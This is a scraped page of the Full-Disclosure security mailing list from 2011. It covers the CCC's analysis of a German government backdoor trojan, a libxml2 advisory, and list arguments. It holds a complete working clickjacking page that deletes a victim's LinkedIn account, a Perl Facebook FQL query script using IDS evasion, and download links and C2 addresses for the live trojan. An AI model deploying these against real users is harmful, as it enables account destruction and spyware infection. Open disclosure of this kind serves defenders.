Secunia - http://secunia.com/
[Full-disclosure] Possible German Governmental Backdoor found (R2D2)
Hi List, i thougt this could be interesting. My english is not very good so i copied the following information from FSecure ( http://www.f-secure.com/weblog/archives/2249.html) Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Goverment. The announcment was made public on ccc.de http://www.ccc.de/ with a detailed 20-page analysis of the functionality of the malware. Download the report in PDFhttp://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf(in German) The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include *Firefox, Skype, MSN Messenger, ICQ* and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 and 207.158.22.134 According to CCC Germany the backdoor could also be exploited by third parties. You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz . You'll need gzip and tar to get the .dll and the .sys file. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:145 ] libxml2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:145 http://www.mandriva.com/security/ ___ Package : libxml2 Date: October 9, 2011 Affected: 2009.0, 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: Double free vulnerabilities in libxml2 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted XPath expression and via vectors related to XPath handling (CVE-2011-2821, CVE-2011-2834). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149amp;products_id=490 The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2821 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2834 ___ Updated Packages: Mandriva Linux 2009.0: 209b07b6de051ff5aec516f90d0422f4 2009.0/i586/libxml2_2-2.7.1-1.8mdv2009.0.i586.rpm 79a2f6e4f012fdd417f379e0b0036d54 2009.0/i586/libxml2-devel-2.7.1-1.8mdv2009.0.i586.rpm cb0134183154b0014b08aad4b37ea73a 2009.0/i586/libxml2-python-2.7.1-1.8mdv2009.0.i586.rpm 118448ed71392dd8c2684277b49e4b74 2009.0/i586/libxml2-utils-2.7.1-1.8mdv2009.0.i586.rpm b684a79602cb5e1bbf368642d85f68fa 2009.0/SRPMS/libxml2-2.7.1-1.8mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 998b5bb8b7d018f03136b646e1b06fdb 2009.0/x86_64/lib64xml2_2-2.7.1-1.8mdv2009.0.x86_64.rpm b1df1cc7c73c6e8d5b3bc0d39f43fa8d 2009.0/x86_64/lib64xml2-devel-2.7.1-1.8mdv2009.0.x86_64.rpm b2e99d7897c1bd6263017f02e98623ae 2009.0/x86_64/libxml2-python-2.7.1-1.8mdv2009.0.x86_64.rpm b7dcd0efbe0280e34fe007e278932a77 2009.0/x86_64/libxml2-utils-2.7.1-1.8mdv2009.0.x86_64.rpm b684a79602cb5e1bbf368642d85f68fa 2009.0/SRPMS/libxml2-2.7.1-1.8mdv2009.0.src.rpm Mandriva Linux 2010.1: b390da9668b76bcf7ffcc8a7bbb53cb5 2010.1/i586/libxml2_2-2.7.7-1.4mdv2010.2.i586.rpm be6fd2244124176aabf9f89b051f7542 2010.1/i586/libxml2-devel-2.7.7-1.4mdv2010.2.i586.rpm dceee4844d365d68c4fe84c69bdd45cc 2010.1/i586/libxml2-python-2.7.7-1.4mdv2010.2.i586.rpm 0e45e718e4ef244cb3da314d7d5fe170 2010.1/i586/libxml2-utils-2.7.7-1.4mdv2010.2.i586.rpm a1f749d4ef5dc23d760d2d8dc79b7e80 2010.1/SRPMS/libxml2-2.7.7-1.4mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 8e9c6a2893459d61c8987a4791838c7f 2010.1/x86_64/lib64xml2_2-2.7.7-1.4mdv2010.2.x86_64.rpm 5a65bad0467ce6c6bccadedbd6ba7300 2010.1/x86_64/lib64xml2-devel-2.7.7-1.4mdv2010.2.x86_64.rpm 4b4add103bd98bfb13d92a83bd69d232 2010.1/x86_64/libxml2-python-2.7.7-1.4mdv2010.2.x86_64.rpm 67c5b1c6e287b153c521c125d7f4c40a 2010.1/x86_64/libxml2-utils-2.7.7-1.4mdv2010.2.x86_64.rpm a1f749d4ef5dc23d760d2d8dc79b7e80 2010.1/SRPMS/libxml2-2.7.7-1.4mdv2010.2.src.rpm Mandriva Linux 2011: a06dd522b3cac6eb67be595b34edab80 2011/i586/libxml2_2-2.7.8-6.2-mdv2011.0.i586.rpm d5356190d0ca32bb10d7df3bf4b53626 2011/i586/libxml2-devel-2.7.8-6.2-mdv2011.0.i586.rpm c536fdef7c40640e2c22442ca17c2685 2011/i586/libxml2-python-2.7.8-6.2-mdv2011.0.i586.rpm d414c5f632c4fb9ccf8452269548c5d4 2011/i586/libxml2-utils-2.7.8-6.2-mdv2011.0.i586.rpm cae1d275c88bbb8f2d4ea3bc62c15066 2011/SRPMS/libxml2-2.7.8-6.2.src.rpm Mandriva Linux 2011/X86_64: 2335fd4f854387849e11cbb3a373f619 2011/x86_64/lib64xml2_2-2.7.8-6.2-mdv2011.0.x86_64.rpm 64e6582b9f726f4eaa9a5d79f3277081 2011/x86_64/lib64xml2-devel-2.7.8-6.2-mdv2011.0.x86_64.rpm 9d35412e2549537879ea108350d7a252 2011/x86_64/libxml2-python-2.7.8-6.2-mdv2011.0.x86_64.rpm 8adc79ebc7ce22b78677467a64fd9074 2011/x86_64/libxml2-utils-2.7.8-6.2-mdv2011.0.x86_64.rpm cae1d275c88bbb8f2d4ea3bc62c15066 2011/SRPMS/libxml2-2.7.8-6.2.src.rpm Mandriva Enterprise Server 5: dd45c34e2b9c3427a3e3322122918855 mes5/i586/libxml2_2-2.7.1-1.8mdvmes5.2.i586.rpm e1ec6cbbf6db0ac41b80591c5697b72d mes5/i586/libxml2-devel-2.7.1-1.8mdvmes5.2.i586.rpm 44c69acf5ea338eeb1c2a885cd6d990b mes5/i586/libxml2-python-2.7.1-1.8mdvmes5.2.i586.rpm 50f4aab7fe60e69a38f5da6b3989c636 mes5/i586/libxml2-utils-2.7.1-1.8mdvmes5.2.i586.rpm bbcb0ee0595285d0195be0b433b01f51 mes5/SRPMS/libxml2-2.7.1-1.8mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 2f5601898b050b63c6bcc67859b371cc mes5/x86_64/lib64xml2_2-2.7.1-1.8mdvmes5.2.x86_64.rpm 88c3f00377c5bec85a213459cb88f0cd mes5/x86_64/lib64xml2-devel-2.7.1-1.8mdvmes5.2.x86_64.rpm 8ccdad600cdae46d594f5ca37b1bcd57 mes5/x86_64/libxml2-python-2.7.1-1.8mdvmes5.2.x86_64.rpm 8ccf73d9975c8d88844af0230095e6eb
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned yougotpwn...@googlemail.com wrote: Hi List, i thougt this could be interesting. My english is not very good so i copied the following information from FSecure (http://www.f-secure.com/weblog/archives/2249.html [1]) Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Goverment. The announcment was made public on ccc.de [2] with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF [3] (in German) The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 [4] and 207.158.22.134 According to CCC Germany the backdoor could also be exploited by third parties. You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [5] . You'll need gzip and tar to get the .dll and the .sys file. Links: -- [1] http://www.f-secure.com/weblog/archives/2249.html [2] http://www.ccc.de/ [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf [4] http://webmail.0m3ga.net/tel:83.236.140.90 [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz I was looking at this just late last night. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Some hash values
On Sun, Oct 9, 2011 at 2:44 PM, Michal Zalewski lcam...@coredump.cx wrote: I believe that this is the best place to post the following hash values: MD5Sum:a762a3b9cbfb3d63034646087680b254 SHA1sum:6f25d72bd693b52de25c36d04f9e17f945420580 SHA256sum:d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5 No, for these specific hash values, I believe the appropriate place to post them would be deviantArt. Use subject 'noise' when posting the hashes of your 0day-exploit you are trying to sell. Like this dude http://seclists.org/fulldisclosure/2011/Jul/21 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
seems that you aren't familiar what Clickjacking means then... No,... and am happy not to know :-) , like XSS , i do not waste time with ninoritiy bugs such as 'clickjacking' and these new such terms wich are total BS. anyhow... call it what you like, it is bs (just like the win32 dll crap and simple-xss) CRAP!) xd On 10 October 2011 04:53, Ferenc Kovacs tyr...@gmail.com wrote: it seems that you aren't familiar what Clickjacking means then... On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 sec...@gmail.com wrote: Thats just lame dude if you could remove OTHER poples accounts, then id say 8clap clap*... but own account... whjat about just clicking close account , and lets skip creating a html page, for this... :) cheers On 8 October 2011 17:06, asish agarwalla asishagarwa...@gmail.com wrote: Be logged into Linkedin, in firefox Create a HTML page using the below code Open the created HTML page in a new firefox tab Play the simple game html head style button.dummy1{position:absolute;top:75px;left:177px;z-index:-10} button.dummy3{position:absolute;top:214px;left:177px;z-index:-10} #Div3{ opacity: 0; position: absolute; top: 25px; left: 160px; } #Div2{ opacity: 1; position: absolute; top: 65px; left: 340px; } #Div1 { opacity: 1; position: absolute; top: 65px; left: 195px; } #victim2 { opacity: 1; position: absolute; top: 65px; left: 50px; } #victim { opacity: 0.4; position: absolute; top: -226px; left: -35px; width:800px; height: 800px; } /style /head body div h1Please Click Twice on the Right Options And Then Click Submit/h1 /div div id=Div3 h155+27=?/h1 /div div id=victim2 h155 /h1 /div div id=Div1 h182/h1 /div div id=Div2 h195/h1 /div button type=button class=dummy3Submit/button div id=victim iframe src= https://www.linkedin.com/secure/settings?closemyaccountstart=goback=.nas_*1_*1_*1 border=0 scrolling=no width=650 height=1100/iframe /div /body /html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
Interesting... although that archive seems corrupt... id like to see abit more about this but, very interesting indeed.. specially skype id harvesting, what could this be for. hrms xd On 10 October 2011 07:13, ja...@smithwaysecurity.com wrote: On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned yougotpwn...@googlemail.com wrote: Hi List, i thougt this could be interesting. My english is not very good so i copied the following information from FSecure (http://www.f-secure.com/weblog/archives/2249.html [1]) Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Goverment. The announcment was made public on ccc.de [2] with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF [3] (in German) The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 [4] and 207.158.22.134 According to CCC Germany the backdoor could also be exploited by third parties. You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [5] . You'll need gzip and tar to get the .dll and the .sys file. Links: -- [1] http://www.f-secure.com/weblog/archives/2249.html [2] http://www.ccc.de/ [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf [4] http://webmail.0m3ga.net/tel:83.236.140.90 [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz I was looking at this just late last night. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
Shit man, that's serious business (S-K trying to take over FD) Of course it's not your code dickwad. All ya know is talking posting shit on an IT Sec mailing list. On Sat, Oct 8, 2011 at 7:53 PM, Laurelai laure...@oneechan.org wrote: Blackhatacademy has asked me to post this to the mailing list as im one of the instructors there, I did not personally develop the exploit, please direct questions regarding it to hatter on irc.blackhatacademy.org Overview Over the years, facebook has been vulnerable to numerous web exploitationhttp://www.blackhatacademy.org/security101/index.php?title=Web_Exploitationtechniques, such as XSS http://www.blackhatacademy.org/security101/index.php?title=XSS, FQL injection (similar to SQL injectionhttp://www.blackhatacademy.org/security101/index.php?title=SQL_injection), application worms, and redirect protection bypass. Because they continue to attempt to write their own language implementations, they are repeatedly vulnerable. Security by obscurity doesn't work if they document their own markup language http://developers.facebook.com/docs/reference/fbml/ and query language http://developers.facebook.com/docs/reference/fql/ for attackers. History XSS http://www.blackhatacademy.org/security101/index.php?title=XSS in facebook first started out as a flaw in their fbmlhttp://developers.facebook.com/docs/reference/fbml/markup and subsequently became evident in a variety of facebook applications. Applicationshttp://www.blackhatacademy.org/security101/index.php?title=Applicationsalso exposed users to third party attacks that could affect a user's web browser or force actions as the affected user. Now there is a way to bypass content restrictions on links and posts put on a user's public wall. Facebook was notified of these vulnerabilitieshttp://www.blackhatacademy.org/security101/index.php?title=Vulnerabilityon July 31st, 2011. To date (October 4, 2011) Facebook has yet to do anything about this; demonstrating a deplorable lack of reasonable care for all of their users. For this reason, the vulnerabilityhttp://www.blackhatacademy.org/security101/index.php?title=Vulnerabilityproof of concept code is being brought to light. Facebook has only recently purchased websense to attempt to push this vulnerability under the rug, however the exploit still works. FQL Simply requiring an API key for privileged queries does not protect facebook from people arbitrarily obtaining one. Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. To access Facebook's FQL API, it takes only a well-formed HTTP request with an embedded API key to return a valid XML object. FQL Does not allow the use of JOINS, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious facebook application or directly on the FQL development api page for information gathering. The implementation below uses LibWhisker2 for IDS evasion via session splicing. #!/usr/bin/perluse warnings;use XML::Simple;use LW2;use Getopt::Std;my %opts; getopts('q:',\%opts);my $query = $opts{q} if defined $opts{q};$query = SELECT pic_big FROM user WHERE uid=666 unless defined $opts{q};my $ref = fqlQuery($query);foreach my $parent (sort keys %{$ref}) { if (%{$ref-{$parent}}) { print $parent: \n; foreach my $key (sort keys %{$ref-{$parent}}) { if (%{$ref-{$parent}-{$key}}) { print \t$key : \n; foreach my $mojo (sort keys %{$ref-{$parent}-{$key}}) { print \t\t$mojo : ; print $ref-{$parent}-{$key}-{$mojo}; print \n; } } else { print \t$key : ; print $ref-{$parent}-{$key}; print \n; } } } else { print $parent : . $ref-{$parent} . \n; }}sub fqlQuery { my $q = shift; $q =~ s/ /%20/g; my $link = http://api.facebook.com/method/fql.query?query=$q; http://api.facebook.com/method/fql.query?query=$q; my $text = download($link,api.facebook.com); my $ref = XMLin($text); return($ref);}sub download{ my $uri = shift; my $try = 5; my $host = shift; my %request; my %response; LW2::http_init_request(\%request); $request{'whisker'}-{'method'} = GET; $request{'whisker'}-{'host'} = $host; $request{'whisker'}-{'uri'} = $uri; $request{'whisker'}-{'encode_anti_ids'} = 9; $request{'whisker'}-{'user-agent'} = ; LW2::http_fixup_request(\%request); if(LW2::http_do_request(\%request, \%response)) { if($try 5) { print Failed to fetch $uri on try $try. Retrying...\n; return undef if(!download($uri, $try++)); } print Failed to fetch $uri.\n; return undef; } else { return
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
Hi List, i thougt this could be interesting. My english is not very good so i copied the following information from FSecure ( http://www.f-secure.com/weblog/archives/2249.html) Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Goverment. The announcment was made public on ccc.de http://www.ccc.de/ with a detailed 20-page analysis of the functionality of the malware. Download the report in PDFhttp://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf(in German) The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include *Firefox, Skype, MSN Messenger, ICQ* and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 and 207.158.22.134 According to CCC Germany the backdoor could also be exploited by third parties. You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz . You'll need gzip and tar to get the .dll and the .sys file. Based on what they think the german goverment is behind this trojan? From F-Secure: We have never before analysed a sample that has been suspected to be governmental backdoor. We have also never been asked by any government to avoid detecting their backdoors. Is not it obvious? Which goverment want to say it 'Hi, we do this shit too ... ' ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
On Mon, 10 Oct 2011 09:51:24 +1100, xD 0x41 said: Interesting... although that archive seems corrupt... id like to see abit more about this but, very interesting indeed.. specially skype id harvesting, what could this be for. I hope that was a sarcastic Now what could this *possibly* be for? :) pgpne82Gr9hKV.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said: No,... and am happy not to know :-) , like XSS , i do not waste time with ninoritiy bugs such as 'clickjacking' and these new such terms wich are total BS. It's all total BS till you discover you're a victim of the attack. pgpCPOQkny2eq.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
Ta , ill take a look.. very interesting, id love to see src code ;p That would be in whose hands,... i wonder..hehe.. maybe gov orjustr very very smart hax0r... On 10 October 2011 10:21, You Got Pwned yougotpwn...@googlemail.com wrote: gunzip the archive then use tar. I also made a zip file which contains the extracted .dll and the .sys file and uploaded it herehttp://www.2shared.com/file/QWyk-yCp/bundestrojaner.html . 2011/10/10 xD 0x41 sec...@gmail.com Interesting... although that archive seems corrupt... id like to see abit more about this but, very interesting indeed.. specially skype id harvesting, what could this be for. hrms xd On 10 October 2011 07:13, ja...@smithwaysecurity.com wrote: On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned yougotpwn...@googlemail.com wrote: Hi List, i thougt this could be interesting. My english is not very good so i copied the following information from FSecure (http://www.f-secure.com/weblog/archives/2249.html [1]) Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Goverment. The announcment was made public on ccc.de [2] with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF [3] (in German) The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 [4] and 207.158.22.134 According to CCC Germany the backdoor could also be exploited by third parties. You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [5] . You'll need gzip and tar to get the .dll and the .sys file. Links: -- [1] http://www.f-secure.com/weblog/archives/2249.html [2] http://www.ccc.de/ [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf [4] http://webmail.0m3ga.net/tel:83.236.140.90 [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz I was looking at this just late last night. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
No, i have been through these, and only an idiot would fall for any of these attacks... Persistent XSS maybe harder, but, forget the rest :) Im to old for that. Never been a victim yet, in *any* way, and, certainly, those bugs wont be starting a trend.. cheer. xd On 10 October 2011 10:27, valdis.kletni...@vt.edu wrote: On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said: No,... and am happy not to know :-) , like XSS , i do not waste time with ninoritiy bugs such as 'clickjacking' and these new such terms wich are total BS. It's all total BS till you discover you're a victim of the attack. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
Yeah guys, XSS is nonsense. Exploiting anchor text is where it's at, right secn3t? http://seclists.org/fulldisclosure/2011/Jun/215 On Sun, Oct 9, 2011 at 7:10 PM, xD 0x41 sec...@gmail.com wrote: No, i have been through these, and only an idiot would fall for any of these attacks... Persistent XSS maybe harder, but, forget the rest :) Im to old for that. Never been a victim yet, in *any* way, and, certainly, those bugs wont be starting a trend.. cheer. xd On 10 October 2011 10:27, valdis.kletni...@vt.edu wrote: On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said: No,... and am happy not to know :-) , like XSS , i do not waste time with ninoritiy bugs such as 'clickjacking' and these new such terms wich are total BS. It's all total BS till you discover you're a victim of the attack. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
YEP! When ya do it right, dang right it is! I did never reproduce the EXACT ethod wich made the x41's happen... but, i dun really care for that bug, or you call it a feature..well, i dont know feratures wich have x41's al;l over the emails when made in a special way... so, it was low-level to :) anyhow, no, i wont bother to recreate the email body, without using any 'features' of googles, for you. It is possible to exploit rich text editor, i have said.. the dll itself.. so maybe go investigate and stfu :) now back to the backdoor. On 10 October 2011 11:23, adam a...@papsy.net wrote: Yeah guys, XSS is nonsense. Exploiting anchor text is where it's at, right secn3t? http://seclists.org/fulldisclosure/2011/Jun/215 On Sun, Oct 9, 2011 at 7:10 PM, xD 0x41 sec...@gmail.com wrote: No, i have been through these, and only an idiot would fall for any of these attacks... Persistent XSS maybe harder, but, forget the rest :) Im to old for that. Never been a victim yet, in *any* way, and, certainly, those bugs wont be starting a trend.. cheer. xd On 10 October 2011 10:27, valdis.kletni...@vt.edu wrote: On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said: No,... and am happy not to know :-) , like XSS , i do not waste time with ninoritiy bugs such as 'clickjacking' and these new such terms wich are total BS. It's all total BS till you discover you're a victim of the attack. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
It has some valid uses for sure. Well the Skype id harvesting and sound recording can be used for Counter Intelligence- terrorism operations. But that's just theory. On Mon, 10 Oct 2011 09:51:24 +1100, xD 0x41 sec...@gmail.com wrote: Interesting... although that archive seems corrupt... id like to see abit more about this but, very interesting indeed.. specially skype id harvesting, what could this be for. hrms xd On 10 October 2011 07:13, wrote: On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned wrote: Hi List, i thougt this could be interesting. My english is not very good so i copied the following information from FSecure (http://www.f-secure.com/weblog/archives/2249.html [3] [1]) Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Goverment. The announcment was made public on ccc.de [4] [2] with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF [3] (in German) The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 [4] and 207.158.22.134 According to CCC Germany the backdoor could also be exploited by third parties. You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [5] [5] . You'll need gzip and tar to get the .dll and the .sys file. Links: -- [1] http://www.f-secure.com/weblog/archives/2249.html [6] [2] http://www.ccc.de/ [7] [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf [8] [4] http://webmail.0m3ga.net/tel:83.236.140.90 [9] [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [10] I was looking at this just late last night. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html [11] Hosted and sponsored by Secunia - http://secunia.com/ [12] Links: -- [1] mailto:ja...@smithwaysecurity.com [2] mailto:yougotpwn...@googlemail.com [3] http://www.f-secure.com/weblog/archives/2249.html [4] http://ccc.de [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [6] http://www.f-secure.com/weblog/archives/2249.html [7] http://www.ccc.de/ [8] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf [9] http://webmail.0m3ga.net/tel:83.236.140.90 [10] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [11] http://lists.grok.org.uk/full-disclosure-charter.html [12] http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/